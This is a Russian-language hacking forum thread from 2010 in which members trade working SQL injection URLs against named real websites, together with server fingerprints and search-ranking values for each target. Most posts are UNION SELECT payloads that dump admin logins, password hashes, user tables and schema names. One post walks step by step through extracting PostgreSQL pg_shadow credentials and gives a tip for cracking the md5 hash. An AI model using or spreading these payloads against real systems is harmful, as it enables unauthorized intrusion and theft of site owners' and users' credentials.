SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Code:
    www.jieyanbar.com/jycs.look.php?ID=286 +union+select+1,%String_Col%,3,4,5--
    Host IP: 114.113.148.1
    Web Server: Apache/2.2.3 (CentOS)
    Powered-by: PHP/5.1.6
    DB Server: MySQL >=5
    Current DB: mlyjy

    Code:
    topic.0731fdc.com/Mascot/look.php?id=4+union+select 1,2,%String_Col%--
    Host IP: 222.240.149.26
    Web Server: Apache/2.2.14 (Unix)
    Powered-by: PHP/5.2.11
    DB Server: MySQL >=4.1
    Current DB: 0731fc

    Code:
    www.lisenok.ru/look.php?id=1781 UNION ALL SELECT %String_Col%,2,3,4,5--
    Host IP: 194.135.105.50
    Web Server: Apache/1.3.41 (Unix) PHP/5.2.5
    Powered-by: PHP/5.2.5
    DB Server: MySQL
    Current DB: db_lisenok1

    Code:
    www.tunahan.org/look.php?bolm=basin&id=3  UNION ALL SELECT 1,%String_Col%,3,4,5,6--
    Host IP: 38.113.1.176
    Web Server: Apache
    Powered-by: PHP/5.2.12
    DB Server: MySQL unknown ver
    Current DB: suleyman

    Code:
    www.spravkatver.ru/look.php?cat_id=19&c_id=362&id=3449 AND %True_Expression%
    Host IP: 77.221.130.43
    Web Server: nginx/0.6.32
    Powered-by: PHP/5.2.6-1+lenny8
    DB Server: MySQL
    Current DB: ),$

    Code:
    www.xmkj.net/look.php?id=45457 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    Host IP: 121.199.124.72
    Web Server: Apache/2.0.59 (Unix) DAV/2 mod_jk/1.2.26
    Powered-by: PHP/4.4.9
    DB Server: MySQL unknown ver
    Current DB: zky081_db

    Code:
    www.stalpraas.com/eng/look.php?id=107 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14--
    Host IP: 85.17.197.141
    Web Server: Apache/2
    Powered-by: PHP/5.2.13
    DB Server: MySQL
    Current DB: stalpraa_website

    Code:
    www.diysuits.com/look.php?id=513 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--
    Host IP: 69.163.226.1
    Web Server: Apache
    Powered-by: PHP/5.2.13
    DB Server: MySQL >=5
    Current DB: frsuitssql
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    https://ws1.gaslightmedia.com/tomsmoms/retail_shop/display_product.phtml?cust_id=&user_num=&cust_status=guest&zip=&prod_id=4+union+select+null,null,null,null,null,null,null,version()::int--+
     
    _________________________
    1 person likes this.
  3. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    --Боян--


    http://www.supplierdiversityeurope.eu/news_details.php?id=-82+union+select+1,group_concat(0x0b,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+SDE_users--

    http://www.dulam.com/news_details.php?id=-9+union+select+1,2,3,group_concat(0x0b,Username,0x3a,Password),5,6,7,8+from+dulam_admin--

    http://www.businessanalytica.ru/ru/news/news_details.php?id=-66+union+select+1,2,3,4,group_concat(0x0b,table_name)+from+information_schema.tables--

    http://www.melker-online.de/addinol/news_details.php?id=-14+union+select+1,2,3,4,group_concat(0x0b,table_name),6+from+information_schema.tables--

    http://www.a1accommodation.com.au/news_details.php?id=-11+union+select+1,2,3,4,group_concat(0x0b,table_name),6+from+information_schema.tables--

    http://www.abraxascorp.com/news_details.php?id=-12+union+select+1,2,group_concat(0x0b,admin_login,0x3a,admin_pass),4,5+from+admin--
     
    #12523 Bramin, 21 Jul 2010
    Last edited by a moderator: 21 Jul 2010
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    newmexicohistory.org пр6 тиц10
    Code:
    http://www.newmexicohistory.org/filedetails.php?fileID=23133+union+select+1,2,3,4,concat_ws(0x3a3a,user_name,password)+from+adminUser+--+
    gloriousindia.com пр2
    Code:
    http://www.gloriousindia.com/unleashed/place.php?id=-228659+union+select+1,concat_ws(0x3a3a,email,password,name,pwd),3,4,5,6,7,8,9,10+from+user+--+
    celadon-international.com пр3 тиц10
    Code:
    http://www.celadon-international.com/place.php?id=-38+union+select+concat_ws(0x3a3a,username,password)+from+wh_users+--+
    finance.tut.by пр5 тиц170
    Code:
    http://finance.tut.by/insurance.php?mode=company&id=-1'+union+select+1,2,concat_ws(0x3a3a,id,username,password,email,type),4,5,6,7,8,9,10,11,12,13+from+users+limit+1,100+--+
    10.of.by пр5 тиц210
    Code:
    http://10.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbmV9pz_pz_pz_&md=shop_newsline&news_id=-2272'+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+group+by+table_schema+limit+2,1+--+
     
    1 person likes this.
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.galeriapresenca.pt/site/index.php?pag=noticias&subpag=detalhe&id=51+union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+from+pg_user--
     
    _________________________
  6. so_newbie

    so_newbie Member

    Joined:
    6 Jul 2010
    Messages:
    33
    Likes Received:
    14
    Reputations:
    9
    Code:
    http://www.davico.co.uk/catalogue.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,concat_ws(char(58),version(),user(),database(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9--+
    Version: 5.0.83-community-nt
    User: davico@localhost
    Database: davico
    Os: Win32
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://rantburg.com PR-6


    // смотрим версию Postgre

    http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version() as int)+from+pg_user&D=2006-01-30&SO=&HC=1

    // смотрим доступ к pg_shadow

    http://rantburg.com/poparticle.php?ID=141137+union+select+version()::int+from+pg_shadow&D=2006-01-30&SO=&HC=1

    //круто! есть доступ к pg_shadow, попробуем вытащить логин и пароль

    http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1

    з.ы хочу напомнить что первые три символа xэша это алгоритм шифрования, в нашем случаe md5, при расшифровке нужно это вырезать
     
    _________________________
    #12527 Konqi, 21 Jul 2010
    Last edited: 21 Jul 2010
    2 people like this.
  8. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://www.dwstadium.co.uk/suite.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
    PR-5

    http://www.analisi.ru/info.php?id=-7+union+select+1,group_concat%28column_name%29,3,4%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x70687062625f61636c5f7573657273%20--
    PR-60
    ТИЦ-3
     
  9. boberko

    boberko New Member

    Joined:
    24 Jan 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Скуля: :)
    Code:
    http://www.kuroed.com/?id=158
    Колонка: 1
    Юзер: kuroed@localhost
    Версия: 4.1.22-log
    тИЦ: 90
     
  10. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://www.alphaonenow.org/info.php?id=-57+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%28column_name%29,2,3,4,5,6,7,8,9,0,1,2%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x76625f61646d696e6973747261746f72%20--
    PR-4

    http://www.fourstarrealty.com/agent.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20--
    PR-3
    ТИЦ-10

    http://www.premiermontreal.com/agent.php?id=-37+union+select+1,2,3,4,5%20--

    http://www.rav-riders.com/doc/motos/moto.php?id=-13+union+select+1,2,user(),4,5,6,7,8,9,0,1,2 --
    PR-1

    http://www.bullster.com/en/catalogue-moto.php?id=-93312+union+select+1,2,3,4%20--
    PR-2

    http://katalog.motorky.com/moto.php?id=-98+union+select+1,concat_ws%280x3a,id,username,password%29,3,4,5,6,7,8,9+from+moto_users%20--
    PR-4

    http://www.banzai-moto.com/concession_kawasaki/banzai-fiche-moto.php?id=-54+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20--
    PR-1

    http://www.fcl.ru/filial.php?id=-2+union+select+1 --
    PR-1
    ТИЦ-10
     
    #12530 -PRIVAT-, 22 Jul 2010
    Last edited: 22 Jul 2010
  11. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://infametr.ru/infa/-1079202+'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3+--+

    [​IMG]

    Очень большой траф.
     
    3 people like this.
  12. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Code:
    http://www.[COLOR=DarkOrange]smolensk[/COLOR]2.ru/user.php?login=v.v. AND %True_Expression%
    Host IP: 80.93.48.50
    Web Server: Apache/2.2.14 (Fedora)
    Powered-by: PHP/5.2.9
    DB Server: MySQL
     
  13. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://deti.db.am/play/view/-82977+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21+--+

    Поисковая система.
     
    1 person likes this.
  14. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Microsoft SQL Server 2005
    MySQL4 под вендой =\
    Microsoft SQL Server 2000 с немецкой локализацией
    PostgreSQL 8.3.7
    MySQL5 без каких-либо признаков таблиц с пользовательскими данными..
     
    5 people like this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    шоп

    http://www.eliteshina.ru/tyreinfo.php?id=285+union+select+version()::int,null,null,null,null,null,null+from+pg_user--
     
    _________________________
    1 person likes this.
  16. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://www.domoticaviva.com/PHP/newsphp.php?id=-804+union+select+1,2,3,version%28%29,5,6,7,8/*
    Database Version: 4.1.22
    Database name: qbs057
    User name: [email protected]
     
    1 person likes this.
  17. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://spb.egent.ru/metro/metro.php?id=-187+union+select+1,2,3%20--
    ТИЦ-20

    http://www.agentam.ru/metro.php?id=-139+union+select+concat_ws%280x3a,id_ag,nameco,nam,passwd%29+from+users--
    ТИЦ-10
    PR-2

    http://www.cyb-elles.org/popup/institut.php?id=-3+union+select+1,group_concat%28column_name%29,4,2+from+information_schema.columns+where+table_name=0x62645f666f72756d%20--
    ТИЦ-10
    PR-3
     
    #12537 -PRIVAT-, 23 Jul 2010
    Last edited: 23 Jul 2010
    1 person likes this.
  18. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    cerd-rj.com.br pr 2
    Code:
    http://www.cerd-rj.com.br/cartilha.php?secao=12-999.9+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)--
    tanaka-usa.com pr 5 тиц 10
    Code:
    http://www.tanaka-usa.com/index.php?section=156-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),9,10,11,12,13,14--
    wordsbyrachel.com pr 1
    Code:
    http://wordsbyrachel.com/page.php?go=2-999.9+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)--
     
    1 person likes this.
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    http://www.chirurgie-hernie-paris.com/institut.php?id=30+and+substring(version(),1,1)=4--+

    Version: 4

    ----------------

    http://www.ipb-ild.edu.rs/institut.php?id=1027+and+substring(version(),1,1)=3

    Version: 3

    ----------------

    http://www.agentam.ru/metro.php?id=-139+union+select+1--+
    User: agent_db@localhost
    Database: agent_db
    Version: 5.0.77
    CY: 10
    PR: 2
    Users
    http://www.agentam.ru/metro.php?id=-139+union+select+concat(id_ag,0x3a,ident,0x3a,nameco,0x3a,stat,0x3a,fam,0x3a,nam,0x3a,ot,0x3a,tel1,0x3a,tel2,0x3a,email,0x3a,www,0x3a,icq,0x3a,acc,0x3a,dat_in,0x3a,dat_last,0x3a,col_recs,0x3a,activ,0x3a,ip,0x3a,passwd,0x3a,logo,0x3a,kod,0x3a,smscode)+from+users+limit+0,1--+
     
    #12539 CyberHunter, 24 Jul 2010
    Last edited: 24 Jul 2010
    2 people like this.
  20. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Взрыв мозга, MySQL5. Есть таблицы cpg14x_users fe_users be_users evo_users, но на их просмотр, судя по всему, нет прав :(
     
Thread Status:
Not open for further replies.